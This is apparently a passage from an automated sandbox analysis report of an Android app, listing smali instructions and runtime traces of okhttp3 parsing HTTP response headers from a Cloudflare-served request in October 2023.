                        222invoke-virtual/range {v7 .. v13}, Lanywheresoftware/b4a/BA;->raiseEventFromDifferentThread(Ljava/lang/Object;Ljava/lang/Object;ILjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        223goto_12c: return-void
                        Cross References
                        APIs
                        • java.lang.CharSequence.length
                        Strings
                        • Accept-Ranges: bytes
                        • CF-Cache-Status: DYNAMIC
                        • CF-RAY: 810c84767af20d08-LAX
                        • CF-RAY: 810c8476df0a2b88-LAX
                        • Connection: close
                        • Content-Length: 31
                        • Content-Type: text/html; charset=utf-8
                        • Content-Type: text/plain
                        • Date: Wed, 04 Oct 2023 09:49:53 GMT
                        • ETag: "651c43a8-1f"
                        • Last-Modified: Tue, 03 Oct 2023 16:39:04 GMT
                        • NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        • Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOU4Q1sWFnZt4Dz6VZgVy05ql%2BZYlBuLA6IyxsCaSAZyKhR2uQ4vqIBO77k%2BHSLQB2hB4A32itdBpLBAA9GDslVUuzCTfmEAXNljOUB0m88OKkYye%2BwJWqWusJzqmLyY%2FpU%3D"}],"group":"cf-nel","max_age":604800}
                        • Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qOsEe1%2F4t%2FYABMwRniUtJZIjtq32IDOB6kHWlaKKu6YktqMqbfmyRadvP%2FiBnYfi%2Fuj33wXxPJy3PEHWDreijN3U8HQPKjfuamtXnPda2hKLd%2FuNLXknFZNw7AwJjzveKxc%3D"}],"group":"cf-nel","max_age":604800}
                        • Server: cloudflare
                        • Transfer-Encoding: chunked
                        • Vary: Accept-Encoding
                        • alt-svc: h3=":443"; ma=86400
                        Position Instruction Meta Information
                        0new-instance v0, Lokhttp3/Headers$Builder;
                        2invoke-direct {v0}, Lokhttp3/Headers$Builder;-><init>()V
                        3goto_5:
                        4invoke-virtual {p0}, Lokhttp3/internal/http1/HeadersReader;->readLine()Ljava/lang/String;
                        • Time: 699744
                          • This:
                            • okhttp3.internal.http1.HeadersReader@e3cc993
                          • Return:
                            • Date: Wed, 04 Oct 2023 09:49:53 GMT
                        • Time: 699754
                          • This:
                            • okhttp3.internal.http1.HeadersReader@e3cc993
                          • Return:
                            • Content-Type: text/plain
                        • Time: 699772
                          • This:
                            • okhttp3.internal.http1.HeadersReader@e3cc993
                          • Return:
                            • Content-Length: 31
                        • Time: 699788
                          • This:
                            • okhttp3.internal.http1.HeadersReader@e3cc993
                          • Return:
                            • Connection: close
                        • Time: 699813
                          • This:
                            • okhttp3.internal.http1.HeadersReader@e3cc993
                          • Return:
                            • Last-Modified: Tue, 03 Oct 2023 16:39:04 GMT
                        • Time: 699828
                          • This:
                            • okhttp3.internal.http1.HeadersReader@e3cc993
                          • Return:
                            • ETag: "651c43a8-1f"
                        • Time: 699846
                          • This:
                            • okhttp3.internal.http1.HeadersReader@e3cc993
                          • Return:
                            • Accept-Ranges: bytes
                        • Time: 699857
                          • This:
                            • okhttp3.internal.http1.HeadersReader@e3cc993
                          • Return:
                            • CF-Cache-Status: DYNAMIC
                        • Time: 699870
                          • This:
                            • okhttp3.internal.http1.HeadersReader@e3cc993
                          • Return:
                            • Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOU4Q1sWFnZt4Dz6VZgVy05ql%2BZYlBuLA6IyxsCaSAZyKhR2uQ4vqIBO77k%2BHSLQB2hB4A32itdBpLBAA9GDslVUuzCTfmEAXNljOUB0m88OKkYye%2BwJWqWusJzqmLyY%2FpU%3D"}],"group":"cf-nel","max_age":604800}
                        • Time: 699898
                          • This:
                            • okhttp3.internal.http1.HeadersReader@e3cc993
                          • Return:
                            • NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        • Time: 699909
                          • This:
                            • okhttp3.internal.http1.HeadersReader@e3cc993
                          • Return:
                            • Server: cloudflare
                        • Time: 699921
                          • This:
                            • okhttp3.internal.http1.HeadersReader@e3cc993
                          • Return:
                            • CF-RAY: 810c84767af20d08-LAX
                        • Time: 699930
                          • This:
                            • okhttp3.internal.http1.HeadersReader@e3cc993
                          • Return:
                            • alt-svc: h3=":443"; ma=86400
                        • Time: 700306
                          • This:
                            • okhttp3.internal.http1.HeadersReader@3532cf9
                          • Return:
                            • Content-Type: text/html; charset=utf-8
                        • Time: 700322
                          • This:
                            • okhttp3.internal.http1.HeadersReader@3532cf9
                          • Return:
                            • Transfer-Encoding: chunked
                        • Time: 700343
                          • This:
                            • okhttp3.internal.http1.HeadersReader@3532cf9
                          • Return:
                            • Vary: Accept-Encoding
                        • Time: 700363
                          • This:
                            • okhttp3.internal.http1.HeadersReader@3532cf9
                          • Return:
                            • Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qOsEe1%2F4t%2FYABMwRniUtJZIjtq32IDOB6kHWlaKKu6YktqMqbfmyRadvP%2FiBnYfi%2Fuj33wXxPJy3PEHWDreijN3U8HQPKjfuamtXnPda2hKLd%2FuNLXknFZNw7AwJjzveKxc%3D"}],"group":"cf-nel","max_age":604800}
                        • Time: 700395
                          • This:
                            • okhttp3.internal.http1.HeadersReader@3532cf9
                          • Return:
                            • CF-RAY: 810c8476df0a2b88-LAX
                        5move-result-object v1
                        6move-object v2, v1
                        7check-cast v2, Ljava/lang/CharSequence;
                        9invoke-interface {v2}, Ljava/lang/CharSequence;->length()I
                        10move-result v2
                        11if-nez v2, :cond_14
                        12const/4 v2, 0x1
                        13goto/16 :goto_15
                        14cond_14: const/4 v2, 0x0
                        15goto_15: if-eqz v2, :cond_1c
                        17invoke-virtual {v0}, Lokhttp3/Headers$Builder;->build()Lokhttp3/Headers;
                        18move-result-object v0
                        19return-object v0
                        20cond_1c:
                        21invoke-virtual {v0, v1}, Lokhttp3/Headers$Builder;->addLenient$okhttp(Ljava/lang/String;)Lokhttp3/Headers$Builder;
                        22goto/16 :goto_5
                        Cross References
                        APIs
                        Strings
                        • Accept-Ranges: bytes
                        • CF-Cache-Status: DYNAMIC
                        • CF-RAY: 810c84767af20d08-LAX
                        • CF-RAY: 810c8476df0a2b88-LAX
                        • Connection: close
                        • Content-Length: 31
                        • Content-Type: text/html; charset=utf-8
                        • Content-Type: text/plain
                        • Date: Wed, 04 Oct 2023 09:49:53 GMT
                        • ETag: "651c43a8-1f"
                        • HTTP/1.1 200 OK
                        • Last-Modified: Tue, 03 Oct 2023 16:39:04 GMT
                        • NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        • Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOU4Q1sWFnZt4Dz6VZgVy05ql%2BZYlBuLA6IyxsCaSAZyKhR2uQ4vqIBO77k%2BHSLQB2hB4A32itdBpLBAA9GDslVUuzCTfmEAXNljOUB0m88OKkYye%2BwJWqWusJzqmLyY%2FpU%3D"}],"group":"cf-nel","max_age":604800}
                        • Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qOsEe1%2F4t%2FYABMwRniUtJZIjtq32IDOB6kHWlaKKu6YktqMqbfmyRadvP%2FiBnYfi%2Fuj33wXxPJy3PEHWDreijN3U8HQPKjfuamtXnPda2hKLd%2FuNLXknFZNw7AwJjzveKxc%3D"}],"group":"cf-nel","max_age":604800}
                        • Server: cloudflare
                        • Transfer-Encoding: chunked
                        • Vary: Accept-Encoding
                        • alt-svc: h3=":443"; ma=86400
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/io/EOFException;
                        3}
                        4.end annotation
                        6sget-object v0, Lkotlin/text/Charsets;->UTF_8:Ljava/nio/charset/Charset;
                        8invoke-virtual {p0, p1, p2, v0}, Lokio/Buffer;->readString(JLjava/nio/charset/Charset;)Ljava/lang/String;
                        • Time: 699713
                          • This:
                            • HTTP/1.1 200 OK
                          • p0: [B@d0f05cd
                          • p0: HTTP/1.1 200 OKDate: Wed, 04 Oct 2023 09:49:53 GMTContent-Type: text/plainContent-Length: 31Connection: closeLast-Modified: Tue, 03 Oct 2023 16:39:04 GMTETag: "651c43a8-1f"Accept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOU4Q1sWFnZt4Dz6VZgVy05ql%2BZYlBuLA6IyxsCaSAZyKhR2uQ4vqIBO77k%2BHSLQB2hB4A32itdBpLBAA9GDslVUuzCTfmEAXNljOUB0m88OKkYye%2BwJWqWusJzqmLyY%2FpU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 810c84767af20d08-LAXalt-svc: h3=":443"; ma=86400
                          • p0: 485454502F312E3120323030204F4B0D0A446174653A205765642C203034204F637420323032332030393A34393A353320474D540D0A436F6E74656E742D547970653A20746578742F706C61696E0D0A436F6E74656E742D4C656E6774683A2033310D0A436F6E6E656374696F6E3A20636C6F73650D0A4C6173742D4D6F6469666965643A205475652C203033204F637420323032332031363A33393A303420474D540D0A455461673A202236353163343361382D3166220D0A4163636570742D52616E6765733A2062797465730D0A43462D43616368652D5374617475733A2044594E414D49430D0A5265706F72742D546F3A207B22656E64706F696E7473223A5B7B2275726C223A2268747470733A5C2F5C2F612E6E656C2E636C6F7564666C6172652E636F6D5C2F7265706F72745C2F76333F733D4D4F553451317357466E5A7434447A36565A6756793035716C2532425A596C42754C413649797873436153415A794B685232755134767149424F37376B25324248534C51423268423441333269746442704C424141394744736C5655757A4354666D4541584E6C6A4F5542306D38384F4B6B597965253242774A57715775734A7A716D4C79592532467055253344227D5D2C2267726F7570223A2263662D6E656C222C226D61785F616765223A3630343830307D0D0A4E454C3A207B22737563636573735F667261
                          • p1: 0
                          • p2: 15
                          • p3: UTF-8
                          • Return:
                            • HTTP/1.1 200 OK
                        • Time: 699731
                          • This:
                            • Date: Wed, 04 Oct 2023 09:49:53 GMT
                          • p0: [B@d0f05cd
                          • p0: HTTP/1.1 200 OKDate: Wed, 04 Oct 2023 09:49:53 GMTContent-Type: text/plainContent-Length: 31Connection: closeLast-Modified: Tue, 03 Oct 2023 16:39:04 GMTETag: "651c43a8-1f"Accept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOU4Q1sWFnZt4Dz6VZgVy05ql%2BZYlBuLA6IyxsCaSAZyKhR2uQ4vqIBO77k%2BHSLQB2hB4A32itdBpLBAA9GDslVUuzCTfmEAXNljOUB0m88OKkYye%2BwJWqWusJzqmLyY%2FpU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 810c84767af20d08-LAXalt-svc: h3=":443"; ma=86400
                          • p0: 485454502F312E3120323030204F4B0D0A446174653A205765642C203034204F637420323032332030393A34393A353320474D540D0A436F6E74656E742D547970653A20746578742F706C61696E0D0A436F6E74656E742D4C656E6774683A2033310D0A436F6E6E656374696F6E3A20636C6F73650D0A4C6173742D4D6F6469666965643A205475652C203033204F637420323032332031363A33393A303420474D540D0A455461673A202236353163343361382D3166220D0A4163636570742D52616E6765733A2062797465730D0A43462D43616368652D5374617475733A2044594E414D49430D0A5265706F72742D546F3A207B22656E64706F696E7473223A5B7B2275726C223A2268747470733A5C2F5C2F612E6E656C2E636C6F7564666C6172652E636F6D5C2F7265706F72745C2F76333F733D4D4F553451317357466E5A7434447A36565A6756793035716C2532425A596C42754C413649797873436153415A794B685232755134767149424F37376B25324248534C51423268423441333269746442704C424141394744736C5655757A4354666D4541584E6C6A4F5542306D38384F4B6B597965253242774A57715775734A7A716D4C79592532467055253344227D5D2C2267726F7570223A2263662D6E656C222C226D61785F616765223A3630343830307D0D0A4E454C3A207B22737563636573735F667261
                          • p1: 17
                          • p2: 35
                          • p3: UTF-8
                          • Return:
                            • Date: Wed, 04 Oct 2023 09:49:53 GMT
                        • Time: 699745
                          • This:
                            • Content-Type: text/plain
                          • p0: [B@d0f05cd
                          • p0: HTTP/1.1 200 OKDate: Wed, 04 Oct 2023 09:49:53 GMTContent-Type: text/plainContent-Length: 31Connection: closeLast-Modified: Tue, 03 Oct 2023 16:39:04 GMTETag: "651c43a8-1f"Accept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOU4Q1sWFnZt4Dz6VZgVy05ql%2BZYlBuLA6IyxsCaSAZyKhR2uQ4vqIBO77k%2BHSLQB2hB4A32itdBpLBAA9GDslVUuzCTfmEAXNljOUB0m88OKkYye%2BwJWqWusJzqmLyY%2FpU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 810c84767af20d08-LAXalt-svc: h3=":443"; ma=86400
                          • p0: 485454502F312E3120323030204F4B0D0A446174653A205765642C203034204F637420323032332030393A34393A353320474D540D0A436F6E74656E742D547970653A20746578742F706C61696E0D0A436F6E74656E742D4C656E6774683A2033310D0A436F6E6E656374696F6E3A20636C6F73650D0A4C6173742D4D6F6469666965643A205475652C203033204F637420323032332031363A33393A303420474D540D0A455461673A202236353163343361382D3166220D0A4163636570742D52616E6765733A2062797465730D0A43462D43616368652D5374617475733A2044594E414D49430D0A5265706F72742D546F3A207B22656E64706F696E7473223A5B7B2275726C223A2268747470733A5C2F5C2F612E6E656C2E636C6F7564666C6172652E636F6D5C2F7265706F72745C2F76333F733D4D4F553451317357466E5A7434447A36565A6756793035716C2532425A596C42754C413649797873436153415A794B685232755134767149424F37376B25324248534C51423268423441333269746442704C424141394744736C5655757A4354666D4541584E6C6A4F5542306D38384F4B6B597965253242774A57715775734A7A716D4C79592532467055253344227D5D2C2267726F7570223A2263662D6E656C222C226D61785F616765223A3630343830307D0D0A4E454C3A207B22737563636573735F667261
                          • p1: 54
                          • p2: 24
                          • p3: UTF-8
                          • Return:
                            • Content-Type: text/plain
                        • Time: 699755
                          • This:
                            • Content-Length: 31
                          • p0: [B@d0f05cd
                          • p0: HTTP/1.1 200 OKDate: Wed, 04 Oct 2023 09:49:53 GMTContent-Type: text/plainContent-Length: 31Connection: closeLast-Modified: Tue, 03 Oct 2023 16:39:04 GMTETag: "651c43a8-1f"Accept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOU4Q1sWFnZt4Dz6VZgVy05ql%2BZYlBuLA6IyxsCaSAZyKhR2uQ4vqIBO77k%2BHSLQB2hB4A32itdBpLBAA9GDslVUuzCTfmEAXNljOUB0m88OKkYye%2BwJWqWusJzqmLyY%2FpU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 810c84767af20d08-LAXalt-svc: h3=":443"; ma=86400
                          • p0: 485454502F312E3120323030204F4B0D0A446174653A205765642C203034204F637420323032332030393A34393A353320474D540D0A436F6E74656E742D547970653A20746578742F706C61696E0D0A436F6E74656E742D4C656E6774683A2033310D0A436F6E6E656374696F6E3A20636C6F73650D0A4C6173742D4D6F6469666965643A205475652C203033204F637420323032332031363A33393A303420474D540D0A455461673A202236353163343361382D3166220D0A4163636570742D52616E6765733A2062797465730D0A43462D43616368652D5374617475733A2044594E414D49430D0A5265706F72742D546F3A207B22656E64706F696E7473223A5B7B2275726C223A2268747470733A5C2F5C2F612E6E656C2E636C6F7564666C6172652E636F6D5C2F7265706F72745C2F76333F733D4D4F553451317357466E5A7434447A36565A6756793035716C2532425A596C42754C413649797873436153415A794B685232755134767149424F37376B25324248534C51423268423441333269746442704C424141394744736C5655757A4354666D4541584E6C6A4F5542306D38384F4B6B597965253242774A57715775734A7A716D4C79592532467055253344227D5D2C2267726F7570223A2263662D6E656C222C226D61785F616765223A3630343830307D0D0A4E454C3A207B22737563636573735F667261
                          • p1: 80
                          • p2: 18
                          • p3: UTF-8
                          • Return:
                            • Content-Length: 31
                        • Time: 699773
                          • This:
                            • Connection: close
                          • p0: [B@d0f05cd
                          • p0: HTTP/1.1 200 OKDate: Wed, 04 Oct 2023 09:49:53 GMTContent-Type: text/plainContent-Length: 31Connection: closeLast-Modified: Tue, 03 Oct 2023 16:39:04 GMTETag: "651c43a8-1f"Accept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOU4Q1sWFnZt4Dz6VZgVy05ql%2BZYlBuLA6IyxsCaSAZyKhR2uQ4vqIBO77k%2BHSLQB2hB4A32itdBpLBAA9GDslVUuzCTfmEAXNljOUB0m88OKkYye%2BwJWqWusJzqmLyY%2FpU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 810c84767af20d08-LAXalt-svc: h3=":443"; ma=86400
                          • p0: 485454502F312E3120323030204F4B0D0A446174653A205765642C203034204F637420323032332030393A34393A353320474D540D0A436F6E74656E742D547970653A20746578742F706C61696E0D0A436F6E74656E742D4C656E6774683A2033310D0A436F6E6E656374696F6E3A20636C6F73650D0A4C6173742D4D6F6469666965643A205475652C203033204F637420323032332031363A33393A303420474D540D0A455461673A202236353163343361382D3166220D0A4163636570742D52616E6765733A2062797465730D0A43462D43616368652D5374617475733A2044594E414D49430D0A5265706F72742D546F3A207B22656E64706F696E7473223A5B7B2275726C223A2268747470733A5C2F5C2F612E6E656C2E636C6F7564666C6172652E636F6D5C2F7265706F72745C2F76333F733D4D4F553451317357466E5A7434447A36565A6756793035716C2532425A596C42754C413649797873436153415A794B685232755134767149424F37376B25324248534C51423268423441333269746442704C424141394744736C5655757A4354666D4541584E6C6A4F5542306D38384F4B6B597965253242774A57715775734A7A716D4C79592532467055253344227D5D2C2267726F7570223A2263662D6E656C222C226D61785F616765223A3630343830307D0D0A4E454C3A207B22737563636573735F667261
                          • p1: 100
                          • p2: 17
                          • p3: UTF-8
                          • Return:
                            • Connection: close
                        • Time: 699789
                          • This:
                            • Last-Modified: Tue, 03 Oct 2023 16:39:04 GMT
                          • p0: [B@d0f05cd
                          • p0: HTTP/1.1 200 OKDate: Wed, 04 Oct 2023 09:49:53 GMTContent-Type: text/plainContent-Length: 31Connection: closeLast-Modified: Tue, 03 Oct 2023 16:39:04 GMTETag: "651c43a8-1f"Accept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOU4Q1sWFnZt4Dz6VZgVy05ql%2BZYlBuLA6IyxsCaSAZyKhR2uQ4vqIBO77k%2BHSLQB2hB4A32itdBpLBAA9GDslVUuzCTfmEAXNljOUB0m88OKkYye%2BwJWqWusJzqmLyY%2FpU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 810c84767af20d08-LAXalt-svc: h3=":443"; ma=86400
                          • p0: 485454502F312E3120323030204F4B0D0A446174653A205765642C203034204F637420323032332030393A34393A353320474D540D0A436F6E74656E742D547970653A20746578742F706C61696E0D0A436F6E74656E742D4C656E6774683A2033310D0A436F6E6E656374696F6E3A20636C6F73650D0A4C6173742D4D6F6469666965643A205475652C203033204F637420323032332031363A33393A303420474D540D0A455461673A202236353163343361382D3166220D0A4163636570742D52616E6765733A2062797465730D0A43462D43616368652D5374617475733A2044594E414D49430D0A5265706F72742D546F3A207B22656E64706F696E7473223A5B7B2275726C223A2268747470733A5C2F5C2F612E6E656C2E636C6F7564666C6172652E636F6D5C2F7265706F72745C2F76333F733D4D4F553451317357466E5A7434447A36565A6756793035716C2532425A596C42754C413649797873436153415A794B685232755134767149424F37376B25324248534C51423268423441333269746442704C424141394744736C5655757A4354666D4541584E6C6A4F5542306D38384F4B6B597965253242774A57715775734A7A716D4C79592532467055253344227D5D2C2267726F7570223A2263662D6E656C222C226D61785F616765223A3630343830307D0D0A4E454C3A207B22737563636573735F667261
                          • p1: 119
                          • p2: 44
                          • p3: UTF-8
                          • Return:
                            • Last-Modified: Tue, 03 Oct 2023 16:39:04 GMT
                        • Time: 699815
                          • This:
                            • ETag: "651c43a8-1f"
                          • p0: [B@d0f05cd
                          • p0: HTTP/1.1 200 OKDate: Wed, 04 Oct 2023 09:49:53 GMTContent-Type: text/plainContent-Length: 31Connection: closeLast-Modified: Tue, 03 Oct 2023 16:39:04 GMTETag: "651c43a8-1f"Accept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOU4Q1sWFnZt4Dz6VZgVy05ql%2BZYlBuLA6IyxsCaSAZyKhR2uQ4vqIBO77k%2BHSLQB2hB4A32itdBpLBAA9GDslVUuzCTfmEAXNljOUB0m88OKkYye%2BwJWqWusJzqmLyY%2FpU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 810c84767af20d08-LAXalt-svc: h3=":443"; ma=86400
                          • p0: 485454502F312E3120323030204F4B0D0A446174653A205765642C203034204F637420323032332030393A34393A353320474D540D0A436F6E74656E742D547970653A20746578742F706C61696E0D0A436F6E74656E742D4C656E6774683A2033310D0A436F6E6E656374696F6E3A20636C6F73650D0A4C6173742D4D6F6469666965643A205475652C203033204F637420323032332031363A33393A303420474D540D0A455461673A202236353163343361382D3166220D0A4163636570742D52616E6765733A2062797465730D0A43462D43616368652D5374617475733A2044594E414D49430D0A5265706F72742D546F3A207B22656E64706F696E7473223A5B7B2275726C223A2268747470733A5C2F5C2F612E6E656C2E636C6F7564666C6172652E636F6D5C2F7265706F72745C2F76333F733D4D4F553451317357466E5A7434447A36565A6756793035716C2532425A596C42754C413649797873436153415A794B685232755134767149424F37376B25324248534C51423268423441333269746442704C424141394744736C5655757A4354666D4541584E6C6A4F5542306D38384F4B6B597965253242774A57715775734A7A716D4C79592532467055253344227D5D2C2267726F7570223A2263662D6E656C222C226D61785F616765223A3630343830307D0D0A4E454C3A207B22737563636573735F667261
                          • p1: 165
                          • p2: 19
                          • p3: UTF-8
                          • Return:
                            • ETag: "651c43a8-1f"
                        • Time: 699830
                          • This:
                            • Accept-Ranges: bytes
                          • p0: [B@d0f05cd
                          • p0: HTTP/1.1 200 OKDate: Wed, 04 Oct 2023 09:49:53 GMTContent-Type: text/plainContent-Length: 31Connection: closeLast-Modified: Tue, 03 Oct 2023 16:39:04 GMTETag: "651c43a8-1f"Accept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOU4Q1sWFnZt4Dz6VZgVy05ql%2BZYlBuLA6IyxsCaSAZyKhR2uQ4vqIBO77k%2BHSLQB2hB4A32itdBpLBAA9GDslVUuzCTfmEAXNljOUB0m88OKkYye%2BwJWqWusJzqmLyY%2FpU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 810c84767af20d08-LAXalt-svc: h3=":443"; ma=86400
                          • p0: 485454502F312E3120323030204F4B0D0A446174653A205765642C203034204F637420323032332030393A34393A353320474D540D0A436F6E74656E742D547970653A20746578742F706C61696E0D0A436F6E74656E742D4C656E6774683A2033310D0A436F6E6E656374696F6E3A20636C6F73650D0A4C6173742D4D6F6469666965643A205475652C203033204F637420323032332031363A33393A303420474D540D0A455461673A202236353163343361382D3166220D0A4163636570742D52616E6765733A2062797465730D0A43462D43616368652D5374617475733A2044594E414D49430D0A5265706F72742D546F3A207B22656E64706F696E7473223A5B7B2275726C223A2268747470733A5C2F5C2F612E6E656C2E636C6F7564666C6172652E636F6D5C2F7265706F72745C2F76333F733D4D4F553451317357466E5A7434447A36565A6756793035716C2532425A596C42754C413649797873436153415A794B685232755134767149424F37376B25324248534C51423268423441333269746442704C424141394744736C5655757A4354666D4541584E6C6A4F5542306D38384F4B6B597965253242774A57715775734A7A716D4C79592532467055253344227D5D2C2267726F7570223A2263662D6E656C222C226D61785F616765223A3630343830307D0D0A4E454C3A207B22737563636573735F667261
                          • p1: 186
                          • p2: 20
                          • p3: UTF-8
                          • Return:
                            • Accept-Ranges: bytes
                        • Time: 699847
                          • This:
                            • CF-Cache-Status: DYNAMIC
                          • p0: [B@d0f05cd
                          • p0: HTTP/1.1 200 OKDate: Wed, 04 Oct 2023 09:49:53 GMTContent-Type: text/plainContent-Length: 31Connection: closeLast-Modified: Tue, 03 Oct 2023 16:39:04 GMTETag: "651c43a8-1f"Accept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOU4Q1sWFnZt4Dz6VZgVy05ql%2BZYlBuLA6IyxsCaSAZyKhR2uQ4vqIBO77k%2BHSLQB2hB4A32itdBpLBAA9GDslVUuzCTfmEAXNljOUB0m88OKkYye%2BwJWqWusJzqmLyY%2FpU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 810c84767af20d08-LAXalt-svc: h3=":443"; ma=86400
                          • p0: 485454502F312E3120323030204F4B0D0A446174653A205765642C203034204F637420323032332030393A34393A353320474D540D0A436F6E74656E742D547970653A20746578742F706C61696E0D0A436F6E74656E742D4C656E6774683A2033310D0A436F6E6E656374696F6E3A20636C6F73650D0A4C6173742D4D6F6469666965643A205475652C203033204F637420323032332031363A33393A303420474D540D0A455461673A202236353163343361382D3166220D0A4163636570742D52616E6765733A2062797465730D0A43462D43616368652D5374617475733A2044594E414D49430D0A5265706F72742D546F3A207B22656E64706F696E7473223A5B7B2275726C223A2268747470733A5C2F5C2F612E6E656C2E636C6F7564666C6172652E636F6D5C2F7265706F72745C2F76333F733D4D4F553451317357466E5A7434447A36565A6756793035716C2532425A596C42754C413649797873436153415A794B685232755134767149424F37376B25324248534C51423268423441333269746442704C424141394744736C5655757A4354666D4541584E6C6A4F5542306D38384F4B6B597965253242774A57715775734A7A716D4C79592532467055253344227D5D2C2267726F7570223A2263662D6E656C222C226D61785F616765223A3630343830307D0D0A4E454C3A207B22737563636573735F667261
                          • p1: 208
                          • p2: 24
                          • p3: UTF-8
                          • Return:
                            • CF-Cache-Status: DYNAMIC
                        • Time: 699859
                          • This:
                            • Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOU4Q1sWFnZt4Dz6VZgVy05ql%2BZYlBuLA6IyxsCaSAZyKhR2uQ4vqIBO77k%2BHSLQB2hB4A32itdBpLBAA9GDslVUuzCTfmEAXNljOUB0m88OKkYye%2BwJWqWusJzqmLyY%2FpU%3D"}],"group":"cf-nel","max_age":604800}
                          • p0: [B@d0f05cd
                          • p0: HTTP/1.1 200 OKDate: Wed, 04 Oct 2023 09:49:53 GMTContent-Type: text/plainContent-Length: 31Connection: closeLast-Modified: Tue, 03 Oct 2023 16:39:04 GMTETag: "651c43a8-1f"Accept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOU4Q1sWFnZt4Dz6VZgVy05ql%2BZYlBuLA6IyxsCaSAZyKhR2uQ4vqIBO77k%2BHSLQB2hB4A32itdBpLBAA9GDslVUuzCTfmEAXNljOUB0m88OKkYye%2BwJWqWusJzqmLyY%2FpU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 810c84767af20d08-LAXalt-svc: h3=":443"; ma=86400
                          • p0: 485454502F312E3120323030204F4B0D0A446174653A205765642C203034204F637420323032332030393A34393A353320474D540D0A436F6E74656E742D547970653A20746578742F706C61696E0D0A436F6E74656E742D4C656E6774683A2033310D0A436F6E6E656374696F6E3A20636C6F73650D0A4C6173742D4D6F6469666965643A205475652C203033204F637420323032332031363A33393A303420474D540D0A455461673A202236353163343361382D3166220D0A4163636570742D52616E6765733A2062797465730D0A43462D43616368652D5374617475733A2044594E414D49430D0A5265706F72742D546F3A207B22656E64706F696E7473223A5B7B2275726C223A2268747470733A5C2F5C2F612E6E656C2E636C6F7564666C6172652E636F6D5C2F7265706F72745C2F76333F733D4D4F553451317357466E5A7434447A36565A6756793035716C2532425A596C42754C413649797873436153415A794B685232755134767149424F37376B25324248534C51423268423441333269746442704C424141394744736C5655757A4354666D4541584E6C6A4F5542306D38384F4B6B597965253242774A57715775734A7A716D4C79592532467055253344227D5D2C2267726F7570223A2263662D6E656C222C226D61785F616765223A3630343830307D0D0A4E454C3A207B22737563636573735F667261
                          • p1: 234
                          • p2: 258
                          • p3: UTF-8
                          • Return:
                            • Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOU4Q1sWFnZt4Dz6VZgVy05ql%2BZYlBuLA6IyxsCaSAZyKhR2uQ4vqIBO77k%2BHSLQB2hB4A32itdBpLBAA9GDslVUuzCTfmEAXNljOUB0m88OKkYye%2BwJWqWusJzqmLyY%2FpU%3D"}],"group":"cf-nel","max_age":604800}
                        • Time: 699871
                          • This:
                            • NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          • p0: [B@d0f05cd
